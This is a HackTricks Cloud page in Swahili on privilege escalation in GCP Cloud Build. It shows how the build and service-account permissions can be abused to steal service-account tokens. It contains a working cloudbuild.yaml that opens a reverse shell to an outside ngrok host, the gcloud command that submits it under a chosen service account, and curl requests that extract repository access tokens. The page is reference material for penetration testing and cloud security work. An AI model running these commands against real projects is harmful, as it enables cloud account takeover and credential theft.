GCP - Cloudbuild Privesc

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

cloudbuild

Kwa taarifa zaidi kuhusu Cloud Build angalia:

GCP - Cloud Build Enum

`cloudbuild.builds.create`, `iam.serviceAccounts.actAs`

Kwa ruhusa hii unaweza kuwasilisha cloud build. Mashine ya cloudbuild itakuwa kwenye filesystem yake kwa chaguo-msingi token ya cloudbuild Service Account: <PROJECT_NUMBER>@cloudbuild.gserviceaccount.com. Hata hivyo, unaweza taja service account yoyote ndani ya project katika configuration ya cloudbuild.
Kwa hivyo, unaweza kufanya mashine i-exfiltrate token kwa server yako au kupata reverse shell ndani yake na kupata token yenyewe (faili inayoshikilia token inaweza kubadilika).

Direct exploitation via gcloud CLI

1- Tengeneza cloudbuild.yaml na uibadilishe na data ya listener yako

Usanidi wa Cloud Build YAML kwa reverse shell

```yaml steps: - name: bash script: | #!/usr/bin/env bash bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14965 0>&1 options: logging: CLOUD_LOGGING_ONLY ```

2- Pakia build rahisi bila chanzo, faili ya yaml na taja SA itakayotumika kwenye build:

Tuma Cloud Build kwa service account iliyotajwa

```bash gcloud builds submit --no-source --config="./cloudbuild.yaml" --service-account="projects//serviceAccounts/@.iam.gserviceaccount.com ```

Kutumia python gcloud library

Unaweza kupata script ya asili ya exploit hapa kwenye GitHub (lakini eneo inachochukua token halikufanya kazi kwangu). Kwa hivyo, angalia script ya ku-automate kuunda, exploit na kusafisha mazingira ya udhaifu hapa na script ya python kupata reverse shell ndani ya mashine ya cloudbuild na kuiba hapa (katika msimbo unaweza kuona jinsi ya kubainisha service accounts nyingine).

Kwa maelezo ya kina, tembelea https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/

`cloudbuild.repositories.accessReadToken`

Kwa ruhusa hii mtumiaji anaweza kupata read access token inayotumika kufikia repository:

Pata read access token ya repository

```bash curl -X POST \ -H "Authorization: Bearer $(gcloud auth print-access-token)" \ -H "Content-Type: application/json" \ -d '{}' \ "https://cloudbuild.googleapis.com/v2/projects//locations//connections//repositories/:accessReadToken" ```

`cloudbuild.repositories.accessReadWriteToken`

Kwa ruhusa hii mtumiaji anaweza kupata tokeni ya upatikanaji ya kusoma na kuandika inayotumika kufikia repository:

Pata tokeni ya upatikanaji ya kusoma na kuandika kwa repository

Kwa ruhusa hii unaweza kupata repos ambazo connection ina ufikiaji wa:

Pata repositories zinazoweza kuunganishwa

```bash curl -X GET \ -H "Authorization: Bearer $(gcloud auth print-access-token)" \ "https://cloudbuild.googleapis.com/v2/projects//locations//connections/:fetchLinkableRepositories" ```

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

HackTricks Cloud